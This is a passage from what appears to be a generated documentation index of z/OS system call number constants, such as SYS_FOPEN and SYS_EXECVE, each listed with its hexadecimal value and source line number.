SYS___WCWIDTH_STD_A (line 1761) | SYS___WCWIDTH_STD_A = 0x68A constant SYS_FOPEN (line 1762) | SYS_FOPEN = 0x069 constant SYS___REGEXEC_A (line 1763) | SYS___REGEXEC_A = 0x69A constant SYS___REGEXEC_STD_A (line 1764) | SYS___REGEXEC_STD_A = 0x69B constant SYS___REGFREE_A (line 1765) | SYS___REGFREE_A = 0x69C constant SYS___REGFREE_STD_A (line 1766) | SYS___REGFREE_STD_A = 0x69D constant SYS___STRCOLL_A (line 1767) | SYS___STRCOLL_A = 0x69E constant SYS___STRCOLL_C_A (line 1768) | SYS___STRCOLL_C_A = 0x69F constant SYS_SCANF (line 1769) | SYS_SCANF = 0x070 constant SYS___A64L_A (line 1770) | SYS___A64L_A = 0x70C constant SYS___ECVT_A (line 1771) | SYS___ECVT_A = 0x70D constant SYS___FCVT_A (line 1772) | SYS___FCVT_A = 0x70E constant SYS___GCVT_A (line 1773) | SYS___GCVT_A = 0x70F constant SYS___STRTOUL_A (line 1774) | SYS___STRTOUL_A = 0x70A constant SYS_____AE_CORRESTBL_QUERY_A (line 1775) | SYS_____AE_CORRESTBL_QUERY_A = 0x70B constant SYS_SPRINTF (line 1776) | SYS_SPRINTF = 0x071 constant SYS___ACCESS_A (line 1777) | SYS___ACCESS_A = 0x71F constant SYS___CATOPEN_A (line 1778) | SYS___CATOPEN_A = 0x71E constant SYS___GETOPT_A (line 1779) | SYS___GETOPT_A = 0x71D constant SYS___REALPATH_A (line 1780) | SYS___REALPATH_A = 0x71A constant SYS___SETENV_A (line 1781) | SYS___SETENV_A = 0x71B constant SYS___SYSTEM_A (line 1782) | SYS___SYSTEM_A = 0x71C constant SYS_FGETC (line 1783) | SYS_FGETC = 0x072 constant SYS___GAI_STRERROR_A (line 1784) | SYS___GAI_STRERROR_A = 0x72F constant SYS___RMDIR_A (line 1785) | SYS___RMDIR_A = 0x72A constant SYS___STATVFS_A (line 1786) | SYS___STATVFS_A = 0x72B constant SYS___SYMLINK_A (line 1787) | SYS___SYMLINK_A = 0x72C constant SYS___TRUNCATE_A (line 1788) | SYS___TRUNCATE_A = 0x72D constant SYS___UNLINK_A (line 1789) | SYS___UNLINK_A = 0x72E constant SYS_VFPRINTF (line 1790) | SYS_VFPRINTF = 0x073 constant SYS___ISSPACE_A (line 1791) | SYS___ISSPACE_A = 0x73A constant SYS___ISUPPER_A (line 1792) | SYS___ISUPPER_A = 0x73B constant SYS___ISWALNUM_A (line 1793) | SYS___ISWALNUM_A = 0x73F constant SYS___ISXDIGIT_A (line 1794) | SYS___ISXDIGIT_A = 0x73C constant SYS___TOLOWER_A (line 1795) | SYS___TOLOWER_A = 0x73D constant SYS___TOUPPER_A (line 1796) | SYS___TOUPPER_A = 0x73E constant SYS_VPRINTF (line 1797) | SYS_VPRINTF = 0x074 constant SYS___CONFSTR_A (line 1798) | SYS___CONFSTR_A = 0x74B constant SYS___FDOPEN_A (line 1799) | SYS___FDOPEN_A = 0x74E constant SYS___FLDATA_A (line 1800) | SYS___FLDATA_A = 0x74F constant SYS___FTOK_A (line 1801) | SYS___FTOK_A = 0x74C constant SYS___ISWXDIGIT_A (line 1802) | SYS___ISWXDIGIT_A = 0x74A constant SYS___MKTEMP_A (line 1803) | SYS___MKTEMP_A = 0x74D constant SYS_VSPRINTF (line 1804) | SYS_VSPRINTF = 0x075 constant SYS___GETGRGID_A (line 1805) | SYS___GETGRGID_A = 0x75A constant SYS___GETGRNAM_A (line 1806) | SYS___GETGRNAM_A = 0x75B constant SYS___GETGROUPSBYNAME_A (line 1807) | SYS___GETGROUPSBYNAME_A = 0x75C constant SYS___GETHOSTENT_A (line 1808) | SYS___GETHOSTENT_A = 0x75D constant SYS___GETHOSTNAME_A (line 1809) | SYS___GETHOSTNAME_A = 0x75E constant SYS___GETLOGIN_A (line 1810) | SYS___GETLOGIN_A = 0x75F constant SYS_GETC (line 1811) | SYS_GETC = 0x076 constant SYS___CREATEWORKUNIT_A (line 1812) | SYS___CREATEWORKUNIT_A = 0x76A constant SYS___CTERMID_A (line 1813) | SYS___CTERMID_A = 0x76B constant SYS___FMTMSG_A (line 1814) | SYS___FMTMSG_A = 0x76C constant SYS___INITGROUPS_A (line 1815) | SYS___INITGROUPS_A = 0x76D constant SYS___MSGRCV_A (line 1816) | SYS___MSGRCV_A = 0x76F constant SYS_____LOGIN_A (line 1817) | SYS_____LOGIN_A = 0x76E constant SYS_FGETS (line 1818) | SYS_FGETS = 0x077 constant SYS___STRCASECMP_A (line 1819) | SYS___STRCASECMP_A = 0x77B constant SYS___STRNCASECMP_A (line 1820) | SYS___STRNCASECMP_A = 0x77C constant SYS___TTYNAME_A (line 1821) | SYS___TTYNAME_A = 0x77D constant SYS___UNAME_A (line 1822) | SYS___UNAME_A = 0x77E constant SYS___UTIMES_A (line 1823) | SYS___UTIMES_A = 0x77F constant SYS_____SERVER_PWU_A (line 1824) | SYS_____SERVER_PWU_A = 0x77A constant SYS_FPUTC (line 1825) | SYS_FPUTC = 0x078 constant SYS___CREAT_O_A (line 1826) | SYS___CREAT_O_A = 0x78E constant SYS___ENVNA (line 1827) | SYS___ENVNA = 0x78F constant SYS___FREAD_A (line 1828) | SYS___FREAD_A = 0x78A constant SYS___FWRITE_A (line 1829) | SYS___FWRITE_A = 0x78B constant SYS___ISASCII (line 1830) | SYS___ISASCII = 0x78D constant SYS___OPEN_O_A (line 1831) | SYS___OPEN_O_A = 0x78C constant SYS_FPUTS (line 1832) | SYS_FPUTS = 0x079 constant SYS___ASCTIME_A (line 1833) | SYS___ASCTIME_A = 0x79C constant SYS___CTIME_A (line 1834) | SYS___CTIME_A = 0x79D constant SYS___GETDATE_A (line 1835) | SYS___GETDATE_A = 0x79E constant SYS___GETSERVBYPORT_A (line 1836) | SYS___GETSERVBYPORT_A = 0x79A constant SYS___GETSERVENT_A (line 1837) | SYS___GETSERVENT_A = 0x79B constant SYS___TZSET_A (line 1838) | SYS___TZSET_A = 0x79F constant SYS_ACL_FROM_TEXT (line 1839) | SYS_ACL_FROM_TEXT = 0x80C constant SYS_ACL_SET_FD (line 1840) | SYS_ACL_SET_FD = 0x80A constant SYS_ACL_SET_FILE (line 1841) | SYS_ACL_SET_FILE = 0x80B constant SYS_ACL_SORT (line 1842) | SYS_ACL_SORT = 0x80E constant SYS_ACL_TO_TEXT (line 1843) | SYS_ACL_TO_TEXT = 0x80D constant SYS_UNGETC (line 1844) | SYS_UNGETC = 0x080 constant SYS___SHUTDOWN_REGISTRATION (line 1845) | SYS___SHUTDOWN_REGISTRATION = 0x80F constant SYS_FREAD (line 1846) | SYS_FREAD = 0x081 constant SYS_FREEADDRINFO (line 1847) | SYS_FREEADDRINFO = 0x81A constant SYS_GAI_STRERROR (line 1848) | SYS_GAI_STRERROR = 0x81B constant SYS_REXEC_AF (line 1849) | SYS_REXEC_AF = 0x81C constant SYS___DYNALLOC_A (line 1850) | SYS___DYNALLOC_A = 0x81F constant SYS___POE (line 1851) | SYS___POE = 0x81D constant SYS_WCSTOMBS (line 1852) | SYS_WCSTOMBS = 0x082 constant SYS___INET_ADDR_A (line 1853) | SYS___INET_ADDR_A = 0x82F constant SYS___NLIST_A (line 1854) | SYS___NLIST_A = 0x82A constant SYS_____TCGETCP_A (line 1855) | SYS_____TCGETCP_A = 0x82B constant SYS_____TCSETCP_A (line 1856) | SYS_____TCSETCP_A = 0x82C constant SYS_____W_PIOCTL_A (line 1857) | SYS_____W_PIOCTL_A = 0x82E constant SYS_MBTOWC (line 1858) | SYS_MBTOWC = 0x083 constant SYS___CABEND (line 1859) | SYS___CABEND = 0x83D constant SYS___LE_CIB_GET (line 1860) | SYS___LE_CIB_GET = 0x83E constant SYS___RECVMSG_A (line 1861) | SYS___RECVMSG_A = 0x83B constant SYS___SENDMSG_A (line 1862) | SYS___SENDMSG_A = 0x83A constant SYS___SET_LAA_FOR_JIT (line 1863) | SYS___SET_LAA_FOR_JIT = 0x83F constant SYS_____LCHATTR_A (line 1864) | SYS_____LCHATTR_A = 0x83C constant SYS_WCTOMB (line 1865) | SYS_WCTOMB = 0x084 constant SYS___CBRTL_B (line 1866) | SYS___CBRTL_B = 0x84A constant SYS___COPYSIGNF_B (line 1867) | SYS___COPYSIGNF_B = 0x84B constant SYS___COPYSIGNL_B (line 1868) | SYS___COPYSIGNL_B = 0x84C constant SYS___COTANF_B (line 1869) | SYS___COTANF_B = 0x84D constant SYS___COTANL_B (line 1870) | SYS___COTANL_B = 0x84F constant SYS___COTAN_B (line 1871) | SYS___COTAN_B = 0x84E constant SYS_MBSTOWCS (line 1872) | SYS_MBSTOWCS = 0x085 constant SYS___LOG1PL_B (line 1873) | SYS___LOG1PL_B = 0x85A constant SYS___LOG2F_B (line 1874) | SYS___LOG2F_B = 0x85B constant SYS___LOG2L_B (line 1875) | SYS___LOG2L_B = 0x85D constant SYS___LOG2_B (line 1876) | SYS___LOG2_B = 0x85C constant SYS___REMAINDERF_B (line 1877) | SYS___REMAINDERF_B = 0x85E constant SYS___REMAINDERL_B (line 1878) | SYS___REMAINDERL_B = 0x85F constant SYS_ACOSHF (line 1879) | SYS_ACOSHF = 0x86E constant SYS_ACOSHL (line 1880) | SYS_ACOSHL = 0x86F constant SYS_WCSCPY (line 1881) | SYS_WCSCPY = 0x086 constant SYS___ERFCF_B (line 1882) | SYS___ERFCF_B = 0x86D constant SYS___ERFF_B (line 1883) | SYS___ERFF_B = 0x86C constant SYS___LROUNDF_B (line 1884) | SYS___LROUNDF_B = 0x86A constant SYS___LROUND_B (line 1885) | SYS___LROUND_B = 0x86B constant SYS_COTANL (line 1886) | SYS_COTANL = 0x87A constant SYS_EXP2F (line 1887) | SYS_EXP2F = 0x87B constant SYS_EXP2L (line 1888) | SYS_EXP2L = 0x87C constant SYS_EXPM1F (line 1889) | SYS_EXPM1F = 0x87D constant SYS_EXPM1L (line 1890) | SYS_EXPM1L = 0x87E constant SYS_FDIMF (line 1891) | SYS_FDIMF = 0x87F constant SYS_WCSCAT (line 1892) | SYS_WCSCAT = 0x087 constant SYS___COTANL (line 1893) | SYS___COTANL = 0x87A constant SYS_REMAINDERF (line 1894) | SYS_REMAINDERF = 0x88A constant SYS_REMAINDERL (line 1895) | SYS_REMAINDERL = 0x88B constant SYS_REMAINDF (line 1896) | SYS_REMAINDF = 0x88A constant SYS_REMAINDL (line 1897) | SYS_REMAINDL = 0x88B constant SYS_REMQUO (line 1898) | SYS_REMQUO = 0x88D constant SYS_REMQUOF (line 1899) | SYS_REMQUOF = 0x88C constant SYS_REMQUOL (line 1900) | SYS_REMQUOL = 0x88E constant SYS_TGAMMAF (line 1901) | SYS_TGAMMAF = 0x88F constant SYS_WCSCHR (line 1902) | SYS_WCSCHR = 0x088 constant SYS_ERFCF (line 1903) | SYS_ERFCF = 0x89B constant SYS_ERFCL (line 1904) | SYS_ERFCL = 0x89C constant SYS_ERFL (line 1905) | SYS_ERFL = 0x89A constant SYS_EXP2 (line 1906) | SYS_EXP2 = 0x89E constant SYS_WCSCMP (line 1907) | SYS_WCSCMP = 0x089 constant SYS___EXP2_B (line 1908) | SYS___EXP2_B = 0x89D constant SYS___FAR_JUMP (line 1909) | SYS___FAR_JUMP = 0x89F constant SYS_ABS (line 1910) | SYS_ABS = 0x090 constant SYS___ERFCL_H (line 1911) | SYS___ERFCL_H = 0x90A constant SYS___EXPF_H (line 1912) | SYS___EXPF_H = 0x90C constant SYS___EXPL_H (line 1913) | SYS___EXPL_H = 0x90D constant SYS___EXPM1_H (line 1914) | SYS___EXPM1_H = 0x90E constant SYS___EXP_H (line 1915) | SYS___EXP_H = 0x90B constant SYS___FDIM_H (line 1916) | SYS___FDIM_H = 0x90F constant SYS_DIV (line 1917) | SYS_DIV = 0x091 constant SYS___LOG2F_H (line 1918) | SYS___LOG2F_H = 0x91F constant SYS___LOG2_H (line 1919) | SYS___LOG2_H = 0x91E constant SYS___LOGB_H (line 1920) | SYS___LOGB_H = 0x91D constant SYS___LOGF_H (line 1921) | SYS___LOGF_H = 0x91B constant SYS___LOGL_H (line 1922) | SYS___LOGL_H = 0x91C constant SYS___LOG_H (line 1923) | SYS___LOG_H = 0x91A constant SYS_LABS (line 1924) | SYS_LABS = 0x092 constant SYS___POWL_H (line 1925) | SYS___POWL_H = 0x92A constant SYS___REMAINDER_H (line 1926) | SYS___REMAINDER_H = 0x92B constant SYS___RINT_H (line 1927) | SYS___RINT_H = 0x92C constant SYS___SCALB_H (line 1928) | SYS___SCALB_H = 0x92D constant SYS___SINF_H (line 1929) | SYS___SINF_H = 0x92F constant SYS___SIN_H (line 1930) | SYS___SIN_H = 0x92E constant SYS_STRNCPY (line 1931) | SYS_STRNCPY = 0x093 constant SYS___TANHF_H (line 1932) | SYS___TANHF_H = 0x93B constant SYS___TANHL_H (line 1933) | SYS___TANHL_H = 0x93C constant SYS___TANH_H (line 1934) | SYS___TANH_H = 0x93A constant SYS___TGAMMAF_H (line 1935) | SYS___TGAMMAF_H = 0x93E constant SYS___TGAMMA_H (line 1936) | SYS___TGAMMA_H = 0x93D constant SYS___TRUNC_H (line 1937) | SYS___TRUNC_H = 0x93F constant SYS_MEMCPY (line 1938) | SYS_MEMCPY = 0x094 constant SYS_VFWSCANF (line 1939) | SYS_VFWSCANF = 0x94A constant SYS_VSWSCANF (line 1940) | SYS_VSWSCANF = 0x94E constant SYS_VWSCANF (line 1941) | SYS_VWSCANF = 0x94C constant SYS_INET6_RTH_ADD (line 1942) | SYS_INET6_RTH_ADD = 0x95D constant SYS_INET6_RTH_INIT (line 1943) | SYS_INET6_RTH_INIT = 0x95C constant SYS_INET6_RTH_REVERSE (line 1944) | SYS_INET6_RTH_REVERSE = 0x95E constant SYS_INET6_RTH_SEGMENTS (line 1945) | SYS_INET6_RTH_SEGMENTS = 0x95F constant SYS_INET6_RTH_SPACE (line 1946) | SYS_INET6_RTH_SPACE = 0x95B constant SYS_MEMMOVE (line 1947) | SYS_MEMMOVE = 0x095 constant SYS_WCSTOLD (line 1948) | SYS_WCSTOLD = 0x95A constant SYS_STRCPY (line 1949) | SYS_STRCPY = 0x096 constant SYS_STRCMP (line 1950) | SYS_STRCMP = 0x097 constant SYS_CABS (line 1951) | SYS_CABS = 0x98E constant SYS_STRCAT (line 1952) | SYS_STRCAT = 0x098 constant SYS___CABS_B (line 1953) | SYS___CABS_B = 0x98F constant SYS___POW_II (line 1954) | SYS___POW_II = 0x98A constant SYS___POW_II_B (line 1955) | SYS___POW_II_B = 0x98B constant SYS___POW_II_H (line 1956) | SYS___POW_II_H = 0x98C constant SYS_CACOSF (line 1957) | SYS_CACOSF = 0x99A constant SYS_CACOSL (line 1958) | SYS_CACOSL = 0x99D constant SYS_STRNCAT (line 1959) | SYS_STRNCAT = 0x099 constant SYS___CACOSF_B (line 1960) | SYS___CACOSF_B = 0x99B constant SYS___CACOSF_H (line 1961) | SYS___CACOSF_H = 0x99C constant SYS___CACOSL_B (line 1962) | SYS___CACOSL_B = 0x99E constant SYS___CACOSL_H (line 1963) | SYS___CACOSL_H = 0x99F constant SYS_ISWALPHA (line 1964) | SYS_ISWALPHA = 0x100 constant SYS_ISWBLANK (line 1965) | SYS_ISWBLANK = 0x101 constant SYS___ISWBLK (line 1966) | SYS___ISWBLK = 0x101 constant SYS_ISWCNTRL (line 1967) | SYS_ISWCNTRL = 0x102 constant SYS_ISWDIGIT (line 1968) | SYS_ISWDIGIT = 0x103 constant SYS_ISWGRAPH (line 1969) | SYS_ISWGRAPH = 0x104 constant SYS_ISWLOWER (line 1970) | SYS_ISWLOWER = 0x105 constant SYS_ISWPRINT (line 1971) | SYS_ISWPRINT = 0x106 constant SYS_ISWPUNCT (line 1972) | SYS_ISWPUNCT = 0x107 constant SYS_ISWSPACE (line 1973) | SYS_ISWSPACE = 0x108 constant SYS_ISWUPPER (line 1974) | SYS_ISWUPPER = 0x109 constant SYS_WCTOB (line 1975) | SYS_WCTOB = 0x110 constant SYS_MBRLEN (line 1976) | SYS_MBRLEN = 0x111 constant SYS_MBRTOWC (line 1977) | SYS_MBRTOWC = 0x112 constant SYS_MBSRTOWC (line 1978) | SYS_MBSRTOWC = 0x113 constant SYS_MBSRTOWCS (line 1979) | SYS_MBSRTOWCS = 0x113 constant SYS_WCRTOMB (line 1980) | SYS_WCRTOMB = 0x114 constant SYS_WCSRTOMB (line 1981) | SYS_WCSRTOMB = 0x115 constant SYS_WCSRTOMBS (line 1982) | SYS_WCSRTOMBS = 0x115 constant SYS___CSID (line 1983) | SYS___CSID = 0x116 constant SYS___WCSID (line 1984) | SYS___WCSID = 0x117 constant SYS_STRPTIME (line 1985) | SYS_STRPTIME = 0x118 constant SYS___STRPTM (line 1986) | SYS___STRPTM = 0x118 constant SYS_STRFMON (line 1987) | SYS_STRFMON = 0x119 constant SYS_WCSCOLL (line 1988) | SYS_WCSCOLL = 0x130 constant SYS_WCSXFRM (line 1989) | SYS_WCSXFRM = 0x131 constant SYS_WCSWIDTH (line 1990) | SYS_WCSWIDTH = 0x132 constant SYS_WCWIDTH (line 1991) | SYS_WCWIDTH = 0x133 constant SYS_WCSFTIME (line 1992) | SYS_WCSFTIME = 0x134 constant SYS_SWPRINTF (line 1993) | SYS_SWPRINTF = 0x135 constant SYS_VSWPRINT (line 1994) | SYS_VSWPRINT = 0x136 constant SYS_VSWPRINTF (line 1995) | SYS_VSWPRINTF = 0x136 constant SYS_SWSCANF (line 1996) | SYS_SWSCANF = 0x137 constant SYS_REGCOMP (line 1997) | SYS_REGCOMP = 0x138 constant SYS_REGEXEC (line 1998) | SYS_REGEXEC = 0x139 constant SYS_GETWC (line 1999) | SYS_GETWC = 0x140 constant SYS_GETWCHAR (line 2000) | SYS_GETWCHAR = 0x141 constant SYS_PUTWC (line 2001) | SYS_PUTWC = 0x142 constant SYS_PUTWCHAR (line 2002) | SYS_PUTWCHAR = 0x143 constant SYS_UNGETWC (line 2003) | SYS_UNGETWC = 0x144 constant SYS_ICONV_OPEN (line 2004) | SYS_ICONV_OPEN = 0x145 constant SYS_ICONV (line 2005) | SYS_ICONV = 0x146 constant SYS_ICONV_CLOSE (line 2006) | SYS_ICONV_CLOSE = 0x147 constant SYS_COLLRANGE (line 2007) | SYS_COLLRANGE = 0x150 constant SYS_CCLASS (line 2008) | SYS_CCLASS = 0x151 constant SYS_COLLORDER (line 2009) | SYS_COLLORDER = 0x152 constant SYS___DEMANGLE (line 2010) | SYS___DEMANGLE = 0x154 constant SYS_FDOPEN (line 2011) | SYS_FDOPEN = 0x155 constant SYS___ERRNO (line 2012) | SYS___ERRNO = 0x156 constant SYS___ERRNO2 (line 2013) | SYS___ERRNO2 = 0x157 constant SYS___TERROR (line 2014) | SYS___TERROR = 0x158 constant SYS_MAXCOLL (line 2015) | SYS_MAXCOLL = 0x169 constant SYS_DLLLOAD (line 2016) | SYS_DLLLOAD = 0x170 constant SYS__EXIT (line 2017) | SYS__EXIT = 0x174 constant SYS_ACCESS (line 2018) | SYS_ACCESS = 0x175 constant SYS_ALARM (line 2019) | SYS_ALARM = 0x176 constant SYS_CFGETISPEED (line 2020) | SYS_CFGETISPEED = 0x177 constant SYS_CFGETOSPEED (line 2021) | SYS_CFGETOSPEED = 0x178 constant SYS_CFSETISPEED (line 2022) | SYS_CFSETISPEED = 0x179 constant SYS_CREAT (line 2023) | SYS_CREAT = 0x180 constant SYS_CTERMID (line 2024) | SYS_CTERMID = 0x181 constant SYS_DUP (line 2025) | SYS_DUP = 0x182 constant SYS_DUP2 (line 2026) | SYS_DUP2 = 0x183 constant SYS_EXECL (line 2027) | SYS_EXECL = 0x184 constant SYS_EXECLE (line 2028) | SYS_EXECLE = 0x185 constant SYS_EXECLP (line 2029) | SYS_EXECLP = 0x186 constant SYS_EXECV (line 2030) | SYS_EXECV = 0x187 constant SYS_EXECVE (line 2031) | SYS_EXECVE = 0x188 constant SYS_EXECVP (line 2032) | SYS_EXECVP = 0x189 constant SYS_FSTAT (line 2033) | SYS_FSTAT = 0x190 constant SYS_FSYNC (line 2034) | SYS_FSYNC = 0x191 constant SYS_FTRUNCATE (line 2035) | SYS_FTRUNCATE = 0x192 constant SYS_GETCWD (line 2036) | SYS_GETCWD = 0x193 constant SYS_GETEGID (line 2037) | SYS_GETEGID = 0x194 constant SYS_GETEUID (line 2038) | SYS_GETEUID = 0x195 constant SYS_GETGID (line 2039) | SYS_GETGID = 0x196 constant SYS_GETGRGID (line 2040) | SYS_GETGRGID = 0x197 constant SYS_GETGRNAM (line 2041) | SYS_GETGRNAM = 0x198 constant SYS_GETGROUPS (line 2042) | SYS_GETGROUPS = 0x199 constant SYS_PTHREAD_MUTEXATTR_DESTROY (line 2043) | SYS_PTHREAD_MUTEXATTR_DESTROY = 0x200 constant SYS_PTHREAD_MUTEXATTR_SETKIND_NP (line 2044) | SYS_PTHREAD_MUTEXATTR_SETKIND_NP = 0x201 constant SYS_PTHREAD_MUTEXATTR_GETKIND_NP (line 2045) | SYS_PTHREAD_MUTEXATTR_GETKIND_NP = 0x202 constant SYS_PTHREAD_MUTEX_INIT (line 2046) | SYS_PTHREAD_MUTEX_INIT = 0x203 constant SYS_PTHREAD_MUTEX_DESTROY (line 2047) | SYS_PTHREAD_MUTEX_DESTROY = 0x204 constant SYS_PTHREAD_MUTEX_LOCK (line 2048) | SYS_PTHREAD_MUTEX_LOCK = 0x205 constant SYS_PTHREAD_MUTEX_TRYLOCK (line 2049) | SYS_PTHREAD_MUTEX_TRYLOCK = 0x206 constant SYS_PTHREAD_MUTEX_UNLOCK (line 2050) | SYS_PTHREAD_MUTEX_UNLOCK = 0x207 constant SYS_PTHREAD_ONCE (line 2051) | SYS_PTHREAD_ONCE = 0x209 constant SYS_TW_OPEN (line 2052) | SYS_TW_OPEN = 0x210 constant SYS_TW_FCNTL (line 2053) | SYS_TW_FCNTL = 0x211 constant SYS_PTHREAD_JOIN_D4_NP (line 2054) | SYS_PTHREAD_JOIN_D4_NP = 0x212 constant SYS_PTHREAD_CONDATTR_SETKIND_NP (line 2055) | SYS_PTHREAD_CONDATTR_SETKIND_NP = 0x213 constant SYS_PTHREAD_CONDATTR_GETKIND_NP (line 2056) | SYS_PTHREAD_CONDATTR_GETKIND_NP = 0x214 constant SYS_EXTLINK_NP (line 2057) | SYS_EXTLINK_NP = 0x215 constant SYS___PASSWD (line 2058) | SYS___PASSWD = 0x216 constant SYS_SETGROUPS (line 2059) | SYS_SETGROUPS = 0x217 constant SYS_INITGROUPS (line 2060) | SYS_INITGROUPS = 0x218 constant SYS_WCSRCHR (line 2061) | SYS_WCSRCHR = 0x240 constant SYS_SVC99 (line 2062) | SYS_SVC99 = 0x241 constant SYS___SVC99 (line 2063) | SYS___SVC99 = 0x241 constant SYS_WCSWCS (line 2064) | SYS_WCSWCS = 0x242 constant SYS_LOCALECO (line 2065) | SYS_LOCALECO = 0x243 constant SYS_LOCALECONV (line 2066) | SYS_LOCALECONV = 0x243 constant SYS___LIBREL (line 2067) | SYS___LIBREL = 0x244 constant SYS_RELEASE (line 2068) | SYS_RELEASE = 0x245 constant SYS___RLSE (line 2069) | SYS___RLSE = 0x245 constant SYS_FLOCATE (line 2070) | SYS_FLOCATE = 0x246 constant SYS___FLOCT (line 2071) | SYS___FLOCT = 0x246 constant SYS_FDELREC (line 2072) | SYS_FDELREC = 0x247 constant SYS___FDLREC (line 2073) | SYS___FDLREC = 0x247 constant SYS_FETCH (line 2074) | SYS_FETCH = 0x248 constant SYS___FETCH (line 2075) | SYS___FETCH = 0x248 constant SYS_QSORT (line 2076) | SYS_QSORT = 0x249 constant SYS___CLEANUPCATCH (line 2077) | SYS___CLEANUPCATCH = 0x260 constant SYS___CATCHMATCH (line 2078) | SYS___CATCHMATCH = 0x261 constant SYS___CLEAN2UPCATCH (line 2079) | SYS___CLEAN2UPCATCH = 0x262 constant SYS_GETPRIORITY (line 2080) | SYS_GETPRIORITY = 0x270 constant SYS_NICE (line 2081) | SYS_NICE = 0x271 constant SYS_SETPRIORITY (line 2082) | SYS_SETPRIORITY = 0x272 constant SYS_GETITIMER (line 2083) | SYS_GETITIMER = 0x273 constant SYS_SETITIMER (line 2084) | SYS_SETITIMER = 0x274 constant SYS_MSGCTL (line 2085) | SYS_MSGCTL = 0x275 constant SYS_MSGGET (line 2086) | SYS_MSGGET = 0x276 constant SYS_MSGRCV (line 2087) | SYS_MSGRCV = 0x277 constant SYS_MSGSND (line 2088) | SYS_MSGSND = 0x278 constant SYS_MSGXRCV (line 2089) | SYS_MSGXRCV = 0x279 constant SYS___MSGXR (line 2090) | SYS___MSGXR = 0x279 constant SYS_SHMGET (line 2091) | SYS_SHMGET = 0x280 constant SYS___GETIPC (line 2092) | SYS___GETIPC = 0x281 constant SYS_SETGRENT (line 2093) | SYS_SETGRENT = 0x282 constant SYS_GETGRENT (line 2094) | SYS_GETGRENT = 0x283 constant SYS_ENDGRENT (line 2095) | SYS_ENDGRENT = 0x284 constant SYS_SETPWENT (line 2096) | SYS_SETPWENT = 0x285 constant SYS_GETPWENT (line 2097) | SYS_GETPWENT = 0x286 constant SYS_ENDPWENT (line 2098) | SYS_ENDPWENT = 0x287 constant SYS_BSD_SIGNAL (line 2099) | SYS_BSD_SIGNAL = 0x288 constant SYS_KILLPG (line 2100) | SYS_KILLPG = 0x289 constant SYS_SIGSET (line 2101) | SYS_SIGSET = 0x290 constant SYS_SIGSTACK (line 2102) | SYS_SIGSTACK = 0x291 constant SYS_GETRLIMIT (line 2103) | SYS_GETRLIMIT = 0x292 constant SYS_SETRLIMIT (line 2104) | SYS_SETRLIMIT = 0x293 constant SYS_GETRUSAGE (line 2105) | SYS_GETRUSAGE = 0x294 constant SYS_MMAP (line 2106) | SYS_MMAP = 0x295 constant SYS_MPROTECT (line 2107) | SYS_MPROTECT = 0x296 constant SYS_MSYNC (line 2108) | SYS_MSYNC = 0x297 constant SYS_MUNMAP (line 2109) | SYS_MUNMAP = 0x298 constant SYS_CONFSTR (line 2110) | SYS_CONFSTR = 0x299 constant SYS___NDMTRM (line 2111) | SYS___NDMTRM = 0x300 constant SYS_FTOK (line 2112) | SYS_FTOK = 0x301 constant SYS_BASENAME (line 2113) | SYS_BASENAME = 0x302 constant SYS_DIRNAME (line 2114) | SYS_DIRNAME = 0x303 constant SYS_GETDTABLESIZE (line 2115) | SYS_GETDTABLESIZE = 0x304 constant SYS_MKSTEMP (line 2116) | SYS_MKSTEMP = 0x305 constant SYS_MKTEMP (line 2117) | SYS_MKTEMP = 0x306 constant SYS_NFTW (line 2118) | SYS_NFTW = 0x307 constant SYS_GETWD (line 2119) | SYS_GETWD = 0x308 constant SYS_LOCKF (line 2120) | SYS_LOCKF = 0x309 constant SYS_WORDEXP (line 2121) | SYS_WORDEXP = 0x310 constant SYS_WORDFREE (line 2122) | SYS_WORDFREE = 0x311 constant SYS_GETPGID (line 2123) | SYS_GETPGID = 0x312 constant SYS_GETSID (line 2124) | SYS_GETSID = 0x313 constant SYS___UTMPXNAME (line 2125) | SYS___UTMPXNAME = 0x314 constant SYS_CUSERID (line 2126) | SYS_CUSERID = 0x315 constant SYS_GETPASS (line 2127) | SYS_GETPASS = 0x316 constant SYS_FNMATCH (line 2128) | SYS_FNMATCH = 0x317 constant SYS_FTW (line 2129) | SYS_FTW = 0x318 constant SYS_GETW (line 2130) | SYS_GETW = 0x319 constant SYS_ACOSH (line 2131) | SYS_ACOSH = 0x320 constant SYS_ASINH (line 2132) | SYS_ASINH = 0x321 constant SYS_ATANH (line 2133) | SYS_ATANH = 0x322 constant SYS_CBRT (line 2134) | SYS_CBRT = 0x323 constant SYS_EXPM1 (line 2135) | SYS_EXPM1 = 0x324 constant SYS_ILOGB (line 2136) | SYS_ILOGB = 0x325 constant SYS_LOGB (line 2137) | SYS_LOGB = 0x326 constant SYS_LOG1P (line 2138) | SYS_LOG1P = 0x327 constant SYS_NEXTAFTER (line 2139) | SYS_NEXTAFTER = 0x328 constant SYS_RINT (line 2140) | SYS_RINT = 0x329 constant SYS_SPAWN (line 2141) | SYS_SPAWN = 0x330 constant SYS_SPAWNP (line 2142) | SYS_SPAWNP = 0x331 constant SYS_GETLOGIN_UU (line 2143) | SYS_GETLOGIN_UU = 0x332 constant SYS_ECVT (line 2144) | SYS_ECVT = 0x333 constant SYS_FCVT (line 2145) | SYS_FCVT = 0x334 constant SYS_GCVT (line 2146) | SYS_GCVT = 0x335 constant SYS_ACCEPT (line 2147) | SYS_ACCEPT = 0x336 constant SYS_BIND (line 2148) | SYS_BIND = 0x337 constant SYS_CONNECT (line 2149) | SYS_CONNECT = 0x338 constant SYS_ENDHOSTENT (line 2150) | SYS_ENDHOSTENT = 0x339 constant SYS_GETHOSTENT (line 2151) | SYS_GETHOSTENT = 0x340 constant SYS_GETHOSTID (line 2152) | SYS_GETHOSTID = 0x341 constant SYS_GETHOSTNAME (line 2153) | SYS_GETHOSTNAME = 0x342 constant SYS_GETNETBYADDR (line 2154) | SYS_GETNETBYADDR = 0x343 constant SYS_GETNETBYNAME (line 2155) | SYS_GETNETBYNAME = 0x344 constant SYS_GETNETENT (line 2156) | SYS_GETNETENT = 0x345 constant SYS_GETPEERNAME (line 2157) | SYS_GETPEERNAME = 0x346 constant SYS_GETPROTOBYNAME (line 2158) | SYS_GETPROTOBYNAME = 0x347 constant SYS_GETPROTOBYNUMBER (line 2159) | SYS_GETPROTOBYNUMBER = 0x348 constant SYS_GETPROTOENT (line 2160) | SYS_GETPROTOENT = 0x349 constant SYS_INET_LNAOF (line 2161) | SYS_INET_LNAOF = 0x350 constant SYS_INET_MAKEADDR (line 2162) | SYS_INET_MAKEADDR = 0x351 constant SYS_INET_NETOF (line 2163) | SYS_INET_NETOF = 0x352 constant 